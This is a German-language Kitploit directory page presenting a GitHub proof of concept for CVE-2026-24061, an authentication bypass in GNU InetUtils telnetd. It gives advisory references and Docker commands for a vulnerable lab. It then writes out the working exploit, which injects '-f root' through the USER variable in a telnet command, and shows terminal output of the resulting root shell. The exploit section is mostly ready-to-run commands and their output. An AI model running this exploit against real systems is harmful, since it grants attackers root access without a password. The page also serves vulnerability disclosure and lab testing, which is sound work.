Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-24061 — GNU telnetd-Dienst aus GNU InetUtils Authentifizierungsumgehung | Kitploit
Tools/GitHubGitHub/typeconfused/cve-2026-24061
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubtypeconfused/cve-2026-24061

CVE-2026-24061

GNU telnetd-Dienst aus GNU InetUtils Authentifizierungsumgehung

Repository anzeigen
vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

GNU InetUtils telnetd Argument Injection Authentication Bypass (CVE-2026-24061)

Im Januar 2026 wurde festgestellt, dass der GNU-telnetd-Dienst von GNU InetUtils anfällig für eine Umgehung der Authentifizierung ist, entdeckt von Kyu Neushwaistein (aka Carlos Cortes Alvarez). Der Fehler, der als CVE-2026-24061 verfolgt wird, ermöglicht es einem Angreifer, eine Telnet-Sitzung ohne Angabe gültiger Anmeldedaten aufzubauen und so unbefugten Zugriff auf das Zielsystem zu erlangen. Die Schwachstelle besteht bis einschließlich Version 2.7-2 des GNU-telnetd-Dienstes und wirkt, als wäre sie direkt aus den 90ern übernommen worden.

Hierbei handelt es sich um eine Argument-Injection-Schwachstelle (CWE-88) mit einem CVSS-v3.1-Score von 9.8 (Kritisch).

Referenzen:

  • https://www.openwall.com/lists/oss-security/2026/01/20/2
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24061
  • https://www.safebreach.com/blog/safebreach-labs-root-cause-analysis-and-poc-exploit-for-cve-2026-24061/
  • https://github.com/SafeBreach-Labs/CVE-2026-24061

Verwundbare Umgebung

Erstellen und ausführen:

root@kitploit:~
docker build -t telnetd-cve-2026-24061 .
docker run --rm -it -p 23:23 telnetd-cve-2026-24061

Nachdem der Dienst gestartet ist, lauscht telnetd auf Port 23.

Ausnutzung

Die Schwachstelle ermöglicht die Umgehung der Authentifizierung durch Injizieren des Flags -f in die Umgebungsvariable USER. Wenn telnetd einen Benutzernamen empfängt, der mit -f beginnt, übergibt es diesen an das Login-Programm, das -f als Flag zur Überspringung der Authentifizierung interpretiert.

Verwenden Sie den folgenden Befehl, um diese Schwachstelle auszunutzen und root-Zugriff zu erlangen:

root@kitploit:~
# Linux-Client (erfordert die Option -a)
USER="-f root" telnet -a 127.0.0.1 23

# macOS-Client (keine Option -a erforderlich)
USER="-f root" telnet 127.0.0.1 23

Nach erfolgreicher Ausnutzung haben Sie Root-Shell-Zugriff, ohne ein Passwort anzugeben.

root@kitploit:~
$ USER='-f root' telnet -a localhost 23
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Linux 6.14.0-37-generic (4dbc1b976c10) (pts/1)

Linux 4dbc1b976c10 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@4dbc1b976c10:~# id
uid=0(root) gid=0(root) groups=0(root)
Tool herunterladen